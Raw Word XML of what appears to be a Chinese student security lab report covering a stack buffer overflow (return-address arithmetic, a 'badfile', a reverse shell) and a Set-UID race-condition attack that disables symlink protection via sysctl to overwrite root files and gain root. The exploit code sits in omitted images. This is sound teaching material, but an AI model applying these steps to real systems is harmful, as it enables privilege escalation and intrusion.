      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E25DD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00E25DD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00E25DD7">
        <w:t>bffff718</w:t>
      </w:r>
      <w:r w:rsidR="00E25DD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E25DD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E25DD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址为</w:t>
      </w:r>
      <w:r w:rsidR="00E25DD7">
        <w:t>0xbffff71c</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:p w14:paraId="5C7CC34F" w14:textId="1D0B81E2" w:rsidR="00190A71" w:rsidRDefault="00A36435" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将地址修改为</w:t>
      </w:r>
      <w:r w:rsidR="00902B40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组地址+1000</w:t>
      </w:r>
      <w:r w:rsidR="007972F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007972F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，0x</w:t>
      </w:r>
      <w:r w:rsidR="007972F3">
        <w:t>bffff7f0+1000 = 0x</w:t>
      </w:r>
      <w:r w:rsidR="007972F3" w:rsidRPr="007972F3">
        <w:t>BFFF FBD8</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:p w14:paraId="53791290" w14:textId="77777777" w:rsidR="00190A71" w:rsidRDefault="00190A71" w:rsidP="0075109A"/>
    <w:p w14:paraId="608FCCD1" w14:textId="3975378F" w:rsidR="00A57794" w:rsidRDefault="00A57794" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60E13D8B" wp14:editId="5E48D68F">
            <wp:extent cx="5274310" cy="21151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3D59" w14:textId="45687FCD" w:rsidR="0075109A" w:rsidRDefault="005B786C" w:rsidP="006B01DE">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Hlk76669413"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写脚本，执行/</w:t>
      </w:r>
      <w:r>
        <w:t>bin/bash ls -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:p w14:paraId="54FBC366" w14:textId="13202686" w:rsidR="00CE4C77" w:rsidRDefault="00CE4C77" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5372A48A" wp14:editId="05B58191">
            <wp:extent cx="6160456" cy="332869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006" cy="33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B375" w14:textId="654B2D28" w:rsidR="005B786C" w:rsidRDefault="005B786C" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1010448E" wp14:editId="34705601">
            <wp:extent cx="5274310" cy="17462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6053" w14:textId="77777777" w:rsidR="005B786C" w:rsidRDefault="005B786C" w:rsidP="0075109A"/>
    <w:p w14:paraId="7BEFAB1E" w14:textId="3E418234" w:rsidR="00D60E78" w:rsidRDefault="00D60E78" w:rsidP="0075109A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>获得一个反向 shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F3CEF" w14:textId="69FC34F2" w:rsidR="0075109A" w:rsidRDefault="00B97F2D" w:rsidP="0075109A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B8812D7" wp14:editId="0717513E">
            <wp:extent cx="5274310" cy="21132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8F1E" w14:textId="1B05985F" w:rsidR="00793EBC" w:rsidRDefault="00495872" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再运行脚本生成相应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B337A6" w14:textId="50C5F11F" w:rsidR="00495872" w:rsidRDefault="00BE271E" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在改写参数的过程中忘记了字符串最多四位，写多了几位发生了错误</w:t>
      </w:r>
      <w:r w:rsidR="00FC4402">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，最后成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C02128" w14:textId="55F51EF6" w:rsidR="00FC4402" w:rsidRDefault="00FC4402" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B1A23A" wp14:editId="1E06EDCE">
            <wp:extent cx="5274310" cy="27730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CBBF" w14:textId="77777777" w:rsidR="00BE271E" w:rsidRDefault="00BE271E" w:rsidP="00D60E78"/>
    <w:p w14:paraId="2CDF9002" w14:textId="17A478D1" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="1BBBA678" w14:textId="08EE1A72" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="31793A84" w14:textId="12C6AF26" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="6B3A0C6F" w14:textId="2CFBF10A" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="585AEA11" w14:textId="32D27B6C" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="4FD5B1A1" w14:textId="540C4DB2" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="770D8831" w14:textId="5D2EBA88" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="13074DD4" w14:textId="77777777" w:rsidR="00603B5E" w:rsidRDefault="00603B5E" w:rsidP="00603B5E">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A41765D" w14:textId="77777777" w:rsidR="00603B5E" w:rsidRDefault="00603B5E" w:rsidP="00603B5E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任务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：利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>竞态条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C66980A" w14:textId="77777777" w:rsidR="00603B5E" w:rsidRDefault="00603B5E" w:rsidP="00603B5E">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman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利用上述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Set-UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>竞态条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞实现以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E391B2" w14:textId="02FD3DE6" w:rsidR="00603B5E" w:rsidRDefault="00603B5E" w:rsidP="00E031BD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>覆盖任意属于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户的文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C4EB6" w14:textId="1646B858" w:rsidR="009831F7" w:rsidRPr="00391083" w:rsidRDefault="009831F7" w:rsidP="009831F7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="69"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00391083">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用如下命令禁用防御</w:t>
      </w:r>
      <w:r w:rsidRPr="00391083">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00391083">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>竞态条件</w:t>
      </w:r>
      <w:r w:rsidRPr="00391083">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00391083">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的保护方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE994A1" w14:textId="31688509" w:rsidR="000406C1" w:rsidRDefault="000406C1" w:rsidP="000406C1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0406C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000406C1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0406C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000406C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000406C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fs.protected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000406C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_symlinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000406C1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="00810EB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9EC35" w14:textId="04E79CE7" w:rsidR="000A159E" w:rsidRDefault="000A159E" w:rsidP="000406C1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14:paraId="447AEFE8" w14:textId="027003D3" w:rsidR="000A159E" w:rsidRPr="000406C1" w:rsidRDefault="000A159E" w:rsidP="000406C1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普通用户生成的程序</w:t>
      </w:r>
      <w:r w:rsidR="00A64AFF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="00A64AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拥有者是</w:t>
      </w:r>
      <w:r w:rsidR="00A64AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>seed</w:t>
      </w:r>
      <w:r w:rsidR="00A64AF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A64AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所属组也是</w:t>
      </w:r>
      <w:r w:rsidR="00A64AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>seed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E9C48F" w14:textId="278EB9FE" w:rsidR="00E031BD" w:rsidRPr="000406C1" w:rsidRDefault="00145ECD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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2981FAEC" wp14:editId="06C3C8E5">
            <wp:extent cx="5274310" cy="7283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CF4" w14:textId="7D631E29" w:rsidR="00E32DD3" w:rsidRDefault="00DE1FEF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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A7DAB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A7DAB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A7DAB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="00FA4A3F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该程序的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA4A3F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>euid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA4A3F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置为root：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E890866" w14:textId="6CFAECA9" w:rsidR="00FA4A3F" w:rsidRDefault="00E648E0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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71560302" wp14:editId="7782FDB5">
            <wp:extent cx="5274310" cy="659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6FE2" w14:textId="5767DEBB" w:rsidR="000A7DAB" w:rsidRDefault="000A7DAB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</w:p>
    <w:p w14:paraId="46D89D86" w14:textId="2DA13AD0" w:rsidR="000A7DAB" w:rsidRDefault="00270155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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录下有两个文件，一个是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003675C3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mylink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003675C3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件，一个是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003675C3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>myfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003675C3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00F174B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，都是属于普通用户</w:t>
      </w:r>
      <w:r w:rsidR="00E11D89">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2BF2A" w14:textId="6EB521C5" w:rsidR="0017344F" w:rsidRDefault="00DE1FEF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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35DD7B6D" wp14:editId="66A33292">
            <wp:extent cx="5274310" cy="11207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009D" w14:textId="3AAA7BD5" w:rsidR="006540BC" w:rsidRDefault="006540BC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</w:p>
    <w:p w14:paraId="395D6D2D" w14:textId="13F980A9" w:rsidR="009E7D3C" w:rsidRDefault="00BC03DA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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编写攻击程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C97F86" w14:textId="29DE6452" w:rsidR="00BC03DA" w:rsidRDefault="0007584A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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BB6BDD" wp14:editId="357EAB35">
            <wp:extent cx="5274310" cy="18516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431F" w14:textId="577AE8BE" w:rsidR="009E7D3C" w:rsidRDefault="009E7D3C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</w:p>
    <w:p w14:paraId="213FAEB8" w14:textId="1A78FAFB" w:rsidR="0007584A" w:rsidRDefault="0007584A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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编写攻击脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E41244F" w14:textId="77B5BE68" w:rsidR="0007584A" w:rsidRDefault="00D81788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256A308" wp14:editId="01A77066">
            <wp:extent cx="5274310" cy="18681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60A3" w14:textId="244278EA" w:rsidR="009D0FF7" w:rsidRDefault="000F4C61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  <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25255DC2" wp14:editId="5A390134">
            <wp:extent cx="5274310" cy="17310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423F" w14:textId="77777777" w:rsidR="009D0FF7" w:rsidRDefault="009D0FF7" w:rsidP="00E031BD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="69"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4359403E" w14:textId="5EA39FBB" w:rsidR="00603B5E" w:rsidRDefault="00603B5E" w:rsidP="004F0E41">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>权限：即你应该能够做任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户可以做的事情。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD453E8" w14:textId="7A79CC63" w:rsidR="004F0E41" w:rsidRDefault="004F0E41" w:rsidP="004F0E41">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
